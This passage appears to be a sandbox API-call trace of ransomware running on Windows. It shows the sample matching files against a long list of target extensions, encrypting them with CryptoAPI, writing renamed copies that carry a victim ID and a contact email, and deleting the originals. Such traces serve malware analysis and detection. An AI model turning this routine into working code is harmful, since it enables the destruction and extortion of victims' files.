	[0192.454] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a"
	[0192.455] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a") returned 67
	[0192.455] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.455] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0192.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.459] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0192.460] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.460] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0192.460] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0192.464] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x155f9, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x155f9, lpOverlapped=0x0) returned 1
	[0192.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.469] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb770) returned 1
	[0192.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.473] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0192.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.473] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0192.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.473] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb92b0) returned 1
	[0192.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.473] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x155f9, dwBufLen=0x155f9 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x15600) returned 1
	[0192.476] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.476] RtlMoveMemory (in: Destination=0xff2788, Source=0xfdd180, Length=0x155f9 | out: Destination=0xff2788) 
	[0192.476] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.477] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff2788*, pdwDataLen=0x18aefc*=0x155f9, dwBufLen=0x15600 | out: pbData=0xff2788*, pdwDataLen=0x18aefc*=0x15600) returned 1
	[0192.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.477] CryptDestroyKey (hKey=0xfb92b0) returned 1
	[0192.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.477] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0192.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.478] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0192.478] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.478] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.479] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.479] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0192.480] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 109
	[0192.480] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0192.481] WriteFile (in: hFile=0x388, lpBuffer=0xff2788*, nNumberOfBytesToWrite=0x15600, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xff2788*, lpNumberOfBytesWritten=0x18b358*=0x15600, lpOverlapped=0x0) returned 1
	[0192.512] CloseHandle (hObject=0x388) returned 1
	[0192.512] CloseHandle (hObject=0x2c0) returned 1
	[0192.512] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a")) returned 1
	[0192.524] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a")) returned 0
	[0192.525] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4886550, ftCreationTime.dwHighDateTime=0x1d9677c, ftLastAccessTime.dwLowDateTime=0x56ce1660, ftLastAccessTime.dwHighDateTime=0x1d96f6f, ftLastWriteTime.dwLowDateTime=0x56ce1660, ftLastWriteTime.dwHighDateTime=0x1d96f6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZigkEMouwXCNeznLl", cAlternateFileName="IZIGKE~1")) returned 1
	[0192.525] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x236fe640, ftCreationTime.dwHighDateTime=0x1d96862, ftLastAccessTime.dwLowDateTime=0x81367780, ftLastAccessTime.dwHighDateTime=0x1d96a3d, ftLastWriteTime.dwLowDateTime=0x81367780, ftLastWriteTime.dwHighDateTime=0x1d96a3d, nFileSizeHigh=0x0, nFileSizeLow=0x1132b, dwReserved0=0x0, dwReserved1=0x0, cFileName="ku2uRUG.mp3", cAlternateFileName="")) returned 1
	[0192.525] lstrcmpW (lpString1="ku2uRUG.mp3", lpString2="..") returned 1
	[0192.525] lstrcmpW (lpString1="ku2uRUG.mp3", lpString2=".") returned 1
	[0192.525] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\"
	[0192.525] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\", lpString2="ku2uRUG.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\ku2uRUG.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\ku2uRUG.mp3"
	[0192.526] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\ku2uRUG.mp3") returned 56
	[0192.526] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.526] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\ku2uRUG.mp3", cchLength=0x38 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3") returned 0x38
	[0192.526] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.526] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0192.527] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3"
	[0192.527] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ku2urug.mp3") returned 56
	[0192.527] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.527] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.527] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0192.528] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.528] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic